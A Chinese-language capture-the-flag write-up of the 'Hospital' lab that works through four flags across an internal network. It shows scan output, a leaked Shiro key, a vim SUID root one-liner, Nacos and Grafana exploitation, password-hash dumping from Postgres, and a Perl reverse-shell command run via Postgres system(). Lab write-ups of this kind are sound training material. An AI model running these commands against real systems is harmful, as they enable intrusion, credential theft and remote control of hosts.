lvzhouhang

春秋云镜-Hospital

  • ~22.65K 字
  1. 1. flag01
  2. 2. flag02
  3. 3. flag03
  4. 4. flag04

flag01

首先扫描一下端口,有一个22端口和8080端口,然后用fscan对这两个端口进行扫描,可以扫到一个heapdump泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan -h 39.99.232.64 -p 8080

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
39.99.232.64:8080 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle http://39.99.232.64:8080  code:302 len:0      toc: true
title:None 跳转url: http://39.99.232.64:8080/login;jsessionid=AABFA3A139D86181B9A09BD41BE26BAD
[*] WebTitle http://39.99.232.64:8080/login;jsessionid=AABFA3A139D86181B9A09BD41BE26BAD code:200 len:2005   toc: true
title:医疗管理后台
[+] PocScan http://39.99.232.64:8080 poc-yaml-spring-actuator-heapdump-file
已完成 1/1
[*] 扫描结束,耗时: 6.890674118s

访问/actuator/heapdump,奖heapdump下载下了,然后用JDumpSpider分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
E:\CTF\heapdump via ☕ v17.0.11
❯ java -jar .\JDumpSpider-1.1-SNAPSHOT-full.jar .\heapdump
===========================================
SpringDataSourceProperties
-------------
not found!

===========================================
WeblogicDataSourceConnectionPoolConfig
-------------
not found!

===========================================
MongoClient
-------------
not found!

===========================================
AliDruidDataSourceWrapper
-------------
not found!

===========================================
HikariDataSource
-------------
not found!

===========================================
RedisStandaloneConfiguration
-------------
not found!

===========================================
JedisClient
-------------
not found!

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

===========================================
OriginTrackedMapPropertySource
-------------
management.endpoints.web.exposure.include = *
server.port = 8080
spring.thymeleaf.prefix = classpath:/templates/

===========================================
MutablePropertySources
-------------
awt.toolkit = sun.awt.X11.XToolkit
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
java.class.path = /app/login-1.0-SNAPSHOT.jar
path.separator = :
java.vm.vendor = Private Build
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
file.encoding = UTF-8
catalina.useNaming = false
spring.beaninfo.ignore = true
java.vm.specification.version = 1.8
os.name = Linux
java.vm.name = OpenJDK 64-Bit Server VM
local.server.port = null
user.country = US
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
sun.java.command = /app/login-1.0-SNAPSHOT.jar
java.io.tmpdir = /tmp
catalina.home = /tmp/tomcat.5978727065775558529.8080
java.version = 1.8.0_392
user.home = /home/app
user.language = en
PID = 750
java.awt.printerjob = sun.print.PSPrinterJob
file.separator = /
catalina.base = /tmp/tomcat.5978727065775558529.8080
java.vm.info = mixed mode
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext

===========================================
MapPropertySources
-------------
local.server.port = null

===========================================
ConsulPropertySources
-------------
not found!

===========================================
JavaProperties
-------------
java.util.logging.FileHandler.pattern = %h/java%u.log
awt.toolkit = sun.awt.X11.XToolkit
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
sun.arch.data.model = 64
catalina.useNaming = false
security.overridePropertiesFile = true
sun.boot.library.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64
security.provider.7 = com.sun.security.sasl.Provider
sun.java.command = /app/login-1.0-SNAPSHOT.jar
security.provider.9 = sun.security.smartcardio.SunPCSC
java.specification.vendor = Oracle Corporation
security.provider.1 = sun.security.provider.Sun
security.provider.2 = sun.security.rsa.SunRsaSign
security.provider.3 = sun.security.ec.SunEC
networkaddress.cache.negative.ttl = 10
security.provider.4 = com.sun.net.ssl.internal.ssl.Provider
security.provider.5 = com.sun.crypto.provider.SunJCE
security.provider.6 = sun.security.jgss.SunProvider
file.separator = /
org.springframework.web.servlet.HandlerExceptionResolver = org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver,org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver,org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
org.springframework.web.servlet.HandlerMapping = org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping,org.springframework.web.servlet.function.support.RouterFunctionMapping
org.springframework.web.servlet.HandlerAdapter = org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter,org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter,org.springframework.web.servlet.function.support.HandlerFunctionAdapter
org.springframework.web.servlet.FlashMapManager = org.springframework.web.servlet.support.SessionFlashMapManager
package.definition = sun.,com.sun.xml.internal.,com.sun.imageio.,com.sun.istack.internal.,com.sun.jmx.,com.sun.media.sound.,com.sun.naming.internal.,com.sun.proxy.,com.sun.corba.se.,com.sun.org.apache.bcel.internal.,com.sun.org.apache.regexp.internal.,com.sun.org.apache.xerces.internal.,com.sun.org.apache.xpath.internal.,com.sun.org.apache.xalan.internal.extensions.,com.sun.org.apache.xalan.internal.lib.,com.sun.org.apache.xalan.internal.res.,com.sun.org.apache.xalan.internal.templates.,com.sun.org.apache.xalan.internal.utils.,com.sun.org.apache.xalan.internal.xslt.,com.sun.org.apache.xalan.internal.xsltc.cmdline.,com.sun.org.apache.xalan.internal.xsltc.compiler.,com.sun.org.apache.xalan.internal.xsltc.trax.,com.sun.org.apache.xalan.internal.xsltc.util.,com.sun.org.apache.xml.internal.res.,com.sun.org.apache.xml.internal.resolver.helpers.,com.sun.org.apache.xml.internal.resolver.readers.,com.sun.org.apache.xml.internal.security.,com.sun.org.apache.xml.internal.serializer.utils.,com.sun.org.apache.xml.internal.utils.,com.sun.org.glassfish.,com.oracle.xmlns.internal.,com.oracle.webservices.internal.,oracle.jrockit.jfr.,org.jcp.xml.dsig.internal.,jdk.internal.,jdk.nashorn.internal.,jdk.nashorn.tools.,jdk.xml.internal.,com.sun.activation.registries.,jdk.jfr.events.,jdk.jfr.internal.,jdk.management.jfr.internal.
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
org.springframework.web.servlet.ThemeResolver = org.springframework.web.servlet.theme.FixedThemeResolver
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
user.name = app
policy.url.1 = file:${java.home}/lib/security/java.policy
securerandom.source = file:/dev/random
policy.url.2 = file:${user.home}/.java.policy
jdk.tls.disabledAlgorithms = SSLv3, TLSv1, TLSv1.1, RC4, DES, MD5withRSA, DH keySize < 1024, EC keySize < 224, 3DES_EDE_CBC, anon, NULL, include jdk.disabled.namedCurves
policy.ignoreIdentityScope = false
file.encoding = UTF-8
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
jdk.sasl.disabledMechanisms =
java.io.tmpdir = /tmp
org.springframework.web.servlet.ViewResolver = org.springframework.web.servlet.view.InternalResourceViewResolver
java.version = 1.8.0_392
java.vm.specification.name = Java Virtual Machine Specification
jdk.tls.keyLimits = AES/GCM/NoPadding KeyUpdate 2^37
PID = 750
java.awt.printerjob = sun.print.PSPrinterJob
jdk.xml.dsig.secureValidationPolicy = disallowAlg http://www.w3.org/TR/1999/REC-xslt-19991116,disallowAlg http://www.w3.org/2001/04/xmldsig-more#rsa-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#hmac-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#md5,maxTransforms 5,maxReferences 30,disallowReferenceUriSchemes file http https,minKeySize RSA 1024,minKeySize DSA 1024,minKeySize EC 224,noDuplicateIds,noRetrievalMethodLoops
java.library.path = /usr/java/packages/lib/amd64:/usr/lib/x86_64-linux-gnu/jni:/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu:/usr/lib/jni:/lib:/usr/lib
java.vendor = Private Build
java.specification.maintenance.version = 5
handlers = java.util.logging.ConsoleHandler
sun.io.unicode.encoding = UnicodeLittle
krb5.kdc.bad.policy = tryLast
java.class.path = /app/login-1.0-SNAPSHOT.jar
java.vm.vendor = Private Build
jdk.security.legacyAlgorithms = SHA1, RSA keySize < 2048, DSA keySize < 2048
jdk.disabled.namedCurves = secp112r1, secp112r2, secp128r1, secp128r2, secp160k1, secp160r1, secp160r2, secp192k1, secp192r1, secp224k1, secp224r1, secp256k1, sect113r1, sect113r2, sect131r1, sect131r2, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1, X9.62 c2tnb191v1, X9.62 c2tnb191v2, X9.62 c2tnb191v3, X9.62 c2tnb239v1, X9.62 c2tnb239v2, X9.62 c2tnb239v3, X9.62 c2tnb359v1, X9.62 c2tnb431r1, X9.62 prime192v2, X9.62 prime192v3, X9.62 prime239v1, X9.62 prime239v2, X9.62 prime239v3, brainpoolP256r1, brainpoolP320r1, brainpoolP384r1, brainpoolP512r1
crypto.policy = unlimited
jceks.key.serialFilter = java.lang.Enum;java.security.KeyRep;java.security.KeyRep$Type;javax.crypto.spec.SecretKeySpec;!*
login.configuration.provider = sun.security.provider.ConfigFile
user.timezone =
java.vm.specification.version = 1.8
os.name = Linux
user.country = US
jdk.security.caDistrustPolicies = SYMANTEC_TLS
sun.cpu.endian = little
user.home = /home/app
user.language = en
en = UTF-8
jdk.tls.alpnCharset = ISO_8859_1
ssl.KeyManagerFactory.algorithm = SunX509
.level = INFO
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
com.xyz.foo.level = SEVERE
policy.provider = sun.security.provider.PolicyFile
path.separator = :
fr = UTF-8
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
keystore.type.compat = true
org.springframework.web.servlet.RequestToViewNameTranslator = org.springframework.web.servlet.view.DefaultRequestToViewNameTranslator
spring.beaninfo.ignore = true
java.vm.name = OpenJDK 64-Bit Server VM
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
java.util.logging.FileHandler.formatter = java.util.logging.XMLFormatter
java.util.logging.FileHandler.count = 1
catalina.home = /tmp/tomcat.5978727065775558529.8080
sun.cds.enableSharedLookupCache = false
sun.security.krb5.maxReferrals = 5
catalina.base = /tmp/tomcat.5978727065775558529.8080
java.util.logging.FileHandler.limit = 50000
java.vm.info = mixed mode
keystore.type = jks
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext
policy.expandProperties = true
securerandom.strongAlgorithms = NativePRNGBlocking:SUN

===========================================
ProcessEnvironment
-------------
not found!

===========================================
OSS
-------------
not found!

===========================================
UserPassSearcher
-------------
org.apache.shiro.web.filter.authc.FormAuthenticationFilter:
[failureKeyAttribute = shiroLoginFailure, loginUrl = /login, successUrl = /, usernameParam = username, passwordParam = password]

org.apache.catalina.startup.Tomcat:
[hostname = localhost]


===========================================
CookieThief
-------------
not found!

===========================================
AuthThief
-------------
not found!

===========================================

有一个shirokey

1
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

用shiro工具注入内存马,冰蝎连接即可

vim.basic存在suid权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
app@web01:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/at
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

系统存在python3环境, 参考https://gtfobins.github.io/gtfobins/vim/ 提权,flag01在/root/flag下

1
/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

flag02

然后搭建一个代理隧道,上传一个fscan开始扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
ip a   
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:0d:aa:83 brd ff:ff:ff:ff:ff:ff
    inet 172.30.12.5/16 brd 172.30.255.255 scope global dynamic eth0
       valid_lft 315357949sec preferred_lft 315357949sec
    inet6 fe80::216:3eff:fe0d:aa83/64 scope link 
       valid_lft forever preferred_lft forever
       
       ./fscan -h 172.30.12.1/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-10 17:23:09] [INFO] 暴力破解线程数: 1
[2025-04-10 17:23:09] [INFO] 开始信息扫描
[2025-04-10 17:23:09] [INFO] CIDR范围: 172.30.12.0-172.30.12.255
[2025-04-10 17:23:10] [INFO] 生成IP范围: 172.30.12.0.%!d(string=172.30.12.255) - %!s(MISSING).%!d(MISSING)
[2025-04-10 17:23:10] [INFO] 解析CIDR 172.30.12.1/24 -> IP范围 172.30.12.0-172.30.12.255
[2025-04-10 17:23:10] [INFO] 最终有效主机数量: 256
[2025-04-10 17:23:10] [INFO] 开始主机扫描
[2025-04-10 17:23:10] [SUCCESS] 目标 172.30.12.5     存活 (ICMP)
[2025-04-10 17:23:10] [SUCCESS] 目标 172.30.12.6     存活 (ICMP)
[2025-04-10 17:23:10] [SUCCESS] 目标 172.30.12.236   存活 (ICMP)
[2025-04-10 17:23:13] [INFO] 存活主机数量: 3
[2025-04-10 17:23:13] [INFO] 有效端口数量: 233
[2025-04-10 17:23:13] [SUCCESS] 端口开放 172.30.12.236:22
[2025-04-10 17:23:13] [SUCCESS] 端口开放 172.30.12.6:445
[2025-04-10 17:23:13] [SUCCESS] 端口开放 172.30.12.6:139
[2025-04-10 17:23:13] [SUCCESS] 端口开放 172.30.12.6:135
[2025-04-10 17:23:13] [SUCCESS] 端口开放 172.30.12.5:22
[2025-04-10 17:23:13] [SUCCESS] 端口开放 172.30.12.236:8009
[2025-04-10 17:23:13] [SUCCESS] 端口开放 172.30.12.5:8080
[2025-04-10 17:23:13] [SUCCESS] 端口开放 172.30.12.236:8080
[2025-04-10 17:23:13] [SUCCESS] 服务识别 172.30.12.236:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-10 17:23:13] [SUCCESS] 服务识别 172.30.12.5:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-10 17:23:13] [SUCCESS] 端口开放 172.30.12.6:8848
[2025-04-10 17:23:18] [SUCCESS] 服务识别 172.30.12.6:445 => 
[2025-04-10 17:23:18] [SUCCESS] 服务识别 172.30.12.6:139 =>  Banner:[.]
[2025-04-10 17:23:18] [SUCCESS] 服务识别 172.30.12.236:8009 => 
[2025-04-10 17:23:18] [SUCCESS] 服务识别 172.30.12.5:8080 => [http]
[2025-04-10 17:23:19] [SUCCESS] 服务识别 172.30.12.236:8080 => [http]
[2025-04-10 17:23:24] [SUCCESS] 服务识别 172.30.12.6:8848 => [http]
[2025-04-10 17:24:18] [SUCCESS] 服务识别 172.30.12.6:135 => 
[2025-04-10 17:24:18] [INFO] 存活端口数量: 9
[2025-04-10 17:24:18] [INFO] 开始漏洞扫描
[2025-04-10 17:24:18] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-10 17:24:18] [SUCCESS] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[2025-04-10 17:24:18] [SUCCESS] NetInfo 扫描结果
目标主机: 172.30.12.6
主机名: Server02
发现的网络接口:
   IPv4地址:
      └─ 172.30.12.6
[2025-04-10 17:24:18] [SUCCESS] 网站标题 http://172.30.12.5:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=BD7C602596372F417AEEB44C6651A392
[2025-04-10 17:24:18] [SUCCESS] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964   标题:医院后台管理平台
[2025-04-10 17:24:19] [SUCCESS] 网站标题 http://172.30.12.5:8080/login;jsessionid=BD7C602596372F417AEEB44C6651A392 状态码:200 长度:2005   标题:医疗管理后台
[2025-04-10 17:24:19] [SUCCESS] 网站标题 http://172.30.12.6:8848   状态码:404 长度:431    标题:HTTP Status 404 – Not Found
[2025-04-10 17:24:20] [SUCCESS] 目标: http://172.30.12.5:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称: 
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-04-10 17:24:20] [SUCCESS] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos
  漏洞名称: 
  详细信息:
        author:AgeloVito
        links:https://blog.csdn.net/caiqiiqi/article/details/112005424
[2025-04-10 17:24:21] [SUCCESS] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
  漏洞名称: 
  详细信息:
        author:kmahyyg(https://github.com/kmahyyg)
        links:https://github.com/alibaba/nacos/issues/4593

扫到了一个nacos,那就从这里入手,弱口令nacos/nacos登录,这个框架还存在yaml反序列化漏洞

在172.30.12.5上面放上恶意的jar文件,然后开启一个web服务,再用利用工具去执行

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nxc rdp 172.30.12.6 -u lv -p Asd123132. --local-auth
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  192.168.11.1:9999  ...  172.30.12.6:3389  ...  OK
[proxychains] Strict chain  ...  192.168.11.1:9999  ...  172.30.12.6:3389  ...  OK
[proxychains] Strict chain  ...  192.168.11.1:9999  ...  172.30.12.6:3389  ...  OK
[proxychains] Strict chain  ...  192.168.11.1:9999  ...  172.30.12.6:3389  ...  OK
RDP         172.30.12.6     3389   Server02         [*] Windows 10 or Windows Server 2016 Build 17763 (name:Server02) (domain:Server02) (nla:True)
[proxychains] Strict chain  ...  192.168.11.1:9999  ...  172.30.12.6:3389  ...  OK
RDP         172.30.12.6     3389   Server02         [+] Server02\lv:Asd123132. (Pwn3d!)

用户添加成功了,挂上代理,远程桌面连接,flag02在C:\Users\Administrator\flag下

flag03

172.30.12.236主机开放了8009端口,登录口传入的数据为 JSON 格式。探测 fastjson 版本 payload:{"@type": "java.lang.AutoCloseable"

https://raw.githubusercontent.com/h0ny/repo/main/images/2ed229594166743d.png)

bp的插件注入内存马,哥斯拉连接,flag03在/root/flag/下

flag04

这个靶机还有第二张网卡

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/ >ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:0d:aa:e2 brd ff:ff:ff:ff:ff:ff
    inet 172.30.12.236/16 brd 172.30.255.255 scope global dynamic eth0
       valid_lft 315354333sec preferred_lft 315354333sec
    inet6 fe80::216:3eff:fe0d:aae2/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:0d:aa:92 brd ff:ff:ff:ff:ff:ff
    inet 172.30.54.179/24 brd 172.30.54.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe0d:aa92/64 scope link 
       valid_lft forever preferred_lft forever

上传一个fscan,然后扫一下,地址为172.30.54.12,需要二层内网代理,这台机器上有grafana+postgres两个服务,grafana存在弱口令admin/admin登录,在web3的机器上上传一个exp,可以跑到postgres的密码

1
2
3
4
5
2024/07/04 12:20:59 Target vulnerable has plugin [alertlist]
2024/07/04 12:20:59 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
2024/07/04 12:20:59 There is [0] records in db.
2024/07/04 12:20:59 type:[postgres]     name:[PostgreSQL]               url:[localhost:5432]    user:[postgres] password[Postgres@123] database:[postgres]     basic_auth_user:[]      basic_auth_password:[]
2024/07/04 12:20:59 All Done, have nice day!

psql -h 172.30.54.12 -p 5432 -U postgres连接,查询root的密码select usename, passwd from pg_shadow;

1
2
3
4
5
postgres=# select usename, passwd from pg_shadow;
 usename  |               passwd
----------+-------------------------------------
 root     | md5da974531914a7c2c56df745574a5bd3a
 postgres | md5dd27d33705155fd675e498384ad3d2ea

爆破出来是P@ssw0rd123,在web03的机器上监听一个端口,然后用perl反弹一个shell

1
select system('perl -e \'use Socket;$i="172.30.54.179";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

然后psql提权,flag04在/root/flag/下

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!